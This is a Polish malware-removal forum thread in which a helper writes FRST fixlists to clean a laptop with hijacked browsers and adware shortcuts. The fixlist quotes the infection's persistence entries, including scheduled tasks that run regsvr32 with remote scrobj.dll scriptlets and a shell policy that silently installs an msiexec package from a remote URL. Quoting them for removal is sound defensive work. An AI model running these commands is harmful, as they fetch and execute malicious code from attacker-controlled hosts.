Skocz do zawartości

Zainfekowane przeglądarki internetowe (BigFarm, big_bang_empire)


Rekomendowane odpowiedzi

Witam,

widzę że mój temat nie jest odosobniony na tym forum. Był chyba jakiś wysyp tych wirusów.

Do rzeczy - otóż przeglądarki internetowe mojej dziewczyny: FireFox i Chrome zostały zawirusowane. Dodatkowo na pulpicie zainstalowały się dwie aplikacje: big farm oraz big bang empire. Według jej wersji, odwiedzając normalne strony internetowe przeglądarka nagle zwariowała. A na dodatek zauważyłem, że nie ma na laptopie antywirusa...zainstalowałem eset, przeskanowałem, ale nic nie pomogło.

W załączniku przesyłam wymagane logi. Jeżeli nie macie nic przeciwko, to dołączyłbym później logi z własnego laptopa. Wydaje mi się, że jest czysty, ale używamy z dziewczyną wspólnych dysków przenośnych itp. Wolałbym mieć pewność. W każdym razie z góry dziękuję za pomoc. Już raz uratowaliście mi cztery litery z zainfekowanym pendrive :)

Pozdrawiam!

 


 

Shortcut.txt

Addition.txt

FRST.txt

GMER.txt

Odnośnik do komentarza
Pomoc jest darmowa, ale proszę rozważ przekazanie dotacji na utrzymanie serwisu: klik.
  • 2 tygodnie później...

KOMPUTER 1

 

Dwie fałszywki: pod Google Chrome i pod Mozilla FireFox. Po za tym widać również wpisy startowe na powłoce i w Harmonogramie zadań uruchamiające różne strony.

 

Za pomoc oczekuję, że przeczytasz lekturę na temat zabezpieczenia się pod takimi sytuacjami: Portale z oprogramowaniem / Instalatory - na co uważać

Treść lektury zweryfikuję w przyszłości sprawdzając czy ktoś z takim adresem IP / nickiem założył kolejny temat z pomocą  :P

 

1. Przez panel sterowania odinstaluj:

  • Programy typu PUP / adware: Browser-Security.
  • Fałszywe oprogramowanie: YAC(Yet Another Cleaner!).
2. Otwórz Notatnik w nim wklej:

 

CloseProcesses:
CreateRestorePoint:
HKU\S-1-5-21-2083115291-1334581206-888238541-1001\...\ChromeHTML: -> C:\Program Files (x86)\Bagsarah\Application\chrome.exe (Google Inc.) 
RemoveDirectory: C:\Program Files (x86)\Bagsarah
RemoveDirectory: C:\Users\Oli\AppData\Local\Bagsarah
RemoveDirectory: C:\Users\Oli\AppData\Roaming\Bagsarah
Task: {1931568F-04AF-4C2B-ADF1-BD0144CBC2B8} - System32\Tasks\Windows-WoShiBeiYongDe => Regsvr32.exe /s /i:hxxp://u76wtn6.x.incapdns.net/?data=zDlkMj8cFjzLOTVWOUZXMjHxMYUcNWM8NjH5MWk8NdRXRUQWOF== scrobj.dll
Task: {FC8FD99D-AA57-480D-9B6C-65A9DDA1F0C1} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lbyhbyc.com/?data=zDlkMj8cFjzLOTVWOUZXMjHxMYUcNWM8NjH5MWk8NdRXRUQWOF== scrobj.dll
C:\Users\Oli\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
C:\Users\Public\Desktop\Google Chrome.lnk
FirewallRules: [{4BDE3553-DFE9-4C43-BF35-695B79DE0740}] => (Allow) C:\Program Files (x86)\Bagsarah\Application\chrome.exe
FirewallRules: [{BF4DAAAD-3B1F-47FE-9568-55FE1FF1A158}] => (Allow) C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe
FirewallRules: [{6EBED432-3F9F-42B1-99AE-71CE5A061BEC}] => (Allow) C:\Program Files (x86)\Firefox\Firefox.exe
RemoveDirectory: C:\Program Files (x86)\Firefox
RemoveDirectory: C:\Users\Oli\AppData\Local\Firefox
RemoveDirectory: C:\Users\Oli\AppData\Roaming\Firefox
HKU\S-1-5-21-2083115291-1334581206-888238541-1001\...\Policies\system: [shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj8cFjzLOTVWOUZXMjHxMYUcNWM8NjH5MWk8NdRXRUQWOF== /q
IFEO\DisplaySwitch.exe: [Debugger]
IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe
IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe
IFEO\taskmgr.exe: [Debugger]
S2 OneDirveSrv; C:\ProgramData\Microsoft OneDrive\setup\SyncTool.dll [X]
2017-05-11 19:25 - 2017-05-11 19:25 - 00000000 _____ C:\WINDOWS\SysWOW64\33
2017-05-11 19:17 - 2017-05-11 19:17 - 00000000 _____ C:\WINDOWS\SysWOW64\3333333
2017-05-11 19:16 - 2017-05-11 19:16 - 00000000 _____ C:\WINDOWS\SysWOW64\1111
2017-05-11 19:15 - 2017-05-11 19:15 - 00000000 _____ C:\WINDOWS\SysWOW64\1111111
2017-05-11 19:16 - 2017-05-11 19:16 - 00000000 _____ C:\WINDOWS\SysWOW64\1111
2017-05-11 19:15 - 2017-05-11 19:15 - 00000000 _____ C:\WINDOWS\SysWOW64\11
2017-05-11 19:15 - 2017-05-11 19:15 - 00000000 _____ C:\WINDOWS\SysWOW64\00
C:\Users\Oli\Desktop\BigFarm.lnk
C:\Users\Oli\Desktop\big_bang_empire.lnk
C:\Users\Oli\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\BigFarm.lnk
C:\Users\Oli\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\big_bang_empire.lnk
C:\Users\Oli\AppData\Local\Microsoft\Windows\ConnectedSearch\History\set_1750160028_en-us.lnk
C:\Users\Oli\AppData\Local\Microsoft\Windows\ConnectedSearch\History\set_3458257333_en-us.lnk
C:\Users\Oli\AppData\Local\Microsoft\Windows\ConnectedSearch\History\set_425821061_en-us.lnk
C:\Users\Oli\AppData\Local\Microsoft\Windows\Application Shortcuts\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\Microsoft.WindowsLive.Calendar.lnk
C:\Users\Oli\AppData\Local\Microsoft\Windows\Application Shortcuts\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\Microsoft.WindowsLive.Mail.lnk
C:\Users\Oli\AppData\Local\Microsoft\Windows\Application Shortcuts\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\Microsoft.WindowsLive.People.lnk
C:\Users\Oli\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk
C:\Users\Public\Desktop\Mozilla Firefox.lnk
C:\Users\Oli\AppData\Local\Microsoft\Windows\ConnectedSearch\History\txt_1377507374_en-US.lnk
C:\Users\Oli\AppData\Local\Microsoft\Windows\ConnectedSearch\History\txt_2104518279_en-US.lnk
C:\Users\Oli\AppData\Local\Microsoft\Windows\ConnectedSearch\History\txt_2525402577_en-US.lnk
EmptyTemp:

 

Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach.

 

Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt.

 

3. Wyczyść i zabezpiecz przeglądarkę Google Chrome:

  • Zresetuj synchronizację (o ile włączona): KLIK.
  • Ustawienia > karta Rozszerzenia > odinstaluj wszystkie nieznane i niepotrzebne Ci rozszerzenia.
  • Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Resetowanie ustawień. Zakładki i hasła nie zostaną naruszone.
  • Ustawienia > karta Ustawienia > sekcja Szukaj > klik w Zarządzanie wyszukiwarkami > skasuj z listy wszystko z wyjątkiem Google.
  • Zainstaluj rozszerzenie blokujące reklamy o podłożu nieinfekcyjnym, polecam rozszerzenie uBlock Origin.
  • Ustaw tą przeglądarkę jako domyślną, aby cofnąć modyfikację infekcji.
4. Wyczyść i zabezpiecz przeglądarkę Mozilla FireFox:
  • Odłącz synchronizację (o ile włączona): KLIK.
  • Menu Pomoc > Informacje dla pomocy technicznej > Odśwież program Firefox. Zakładki i hasła nie zostaną naruszone.
  • Menu Historia > Wyczyść historię przeglądania.
  • Zainstaluj rozszerzenie blokujące reklamy o podłożu nieinfekcyjnym, polecam rozszerzenie uBlock Origin.
5. Uruchom FRST, w polu Szukaj (Search) wklej poniższą frazę i kliknij w Szukaj w rejestrze (Search Registry).

 

bagsarah;firefox

 

Obok FRST powstanie raport SearchReg.txt - zaprezentuj go na forum. 

 

6. Pobierz AdwCleaner uruchom go i kliknij Skanuj, kiedy skanowanie zakończy się wydobądź z niego raport, znajduję się on w folderze C:\AdwCleaner. Raport zaprezentuj na forum.

 

7. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition i Shortcut. Dołącz też plik fixlog.txt.

 

KOMPUTER 2

 

Brak oznak infekcji. 

 

1. Odinstaluj: SecurityCenter (masz przecież rozwiązanie ESET).

 

2. Całościowo przeskanuj system za pomocą programu Malwarebytes AntiMalware. Jeśli coś wykryje to niczego nie usuwaj, a dostarcz raport.

Odnośnik do komentarza

Wielkie dziękuję za szybką pomoc!

Lekturę przeczytam i przypilnuję by dziewczyna przeczytała, bo to z jej laptopem są zawsze problemy :P

Wszystko wykonałem, poza wyczyszczeniem i zabezpieczeniem chroma, gdyż został usunięty. Pozostała tylko mozilla.

W załączniku wymagane raporty.

Pozdrawiam!

Addition.txt

FRST.txt

Shortcut.txt

AdwCleanerS0.txt

Fixlog.txt

SearchReg.txt

Odnośnik do komentarza
  • 2 tygodnie później...

KOMPUTER 1

 

Do wdrążenia będą tylko poprawki. Zakładam, ze Browser-Security nie został odinstalowany, bo ten jego wpis jest martwy. 

 

1. Otwórz Notatnik w nim wklej:

 

CloseProcesses:
CreateRestorePoint:
DeleteKey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Bagsarah
DeleteKey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Bagsarah
"path"="C:\Program Files (x86)\Bagsarah\
DeleteKey: HKEY_USERS\S-1-5-21-2083115291-1334581206-888238541-1001\Software\Bagsarah
DeleteKey: HKEY_USERS\S-1-5-21-2083115291-1334581206-888238541-1001\Software\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\ef952496_0
""="{2}.\\?\hdaudio#func_01&ven_10ec&dev_0270&subsys_1043124d&rev_1001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\espeakertopo/00010001
\Device\HarddiskVolume1\Program Files (x86)\Bagsarah\Application\chrome.exe%b{00000000-0000-0000-0000-000000000000}
FF HKLM-x32\...\Firefox\Extensions: [arthurj8283@gmail.com] - C:\Users\Oli\AppData\Roaming\Mozilla\Firefox\Profiles\m03wbirn.default\extensions\arthurj8283@gmail.com => not found
EmptyTemp:

 

2. Zagrożenia wykryte przez AdwCleaner daj do kasacji (za pomocą opcji Oczyść).

 

3. Potraktuj martwy wpis Browser-Security na liście programów automatem od Microsoft.

Kierunek wykonania: Odinstalowywanie >  Browser-Security

 

4. Podsumuj obecny stan systemu.

 

KOMPUTER 2

 

Czy Malwarebytes wykrył jakieś zagrożenia? Jak tam wygląda sytuacja aktualnie?

Odnośnik do komentarza

Jeśli chcesz dodać odpowiedź, zaloguj się lub zarejestruj nowe konto

Jedynie zarejestrowani użytkownicy mogą komentować zawartość tej strony.

Zarejestruj nowe konto

Załóż nowe konto. To bardzo proste!

Zarejestruj się

Zaloguj się

Posiadasz już konto? Zaloguj się poniżej.

Zaloguj się
  • Ostatnio przeglądający   0 użytkowników

    • Brak zarejestrowanych użytkowników przeglądających tę stronę.
×
×
  • Dodaj nową pozycję...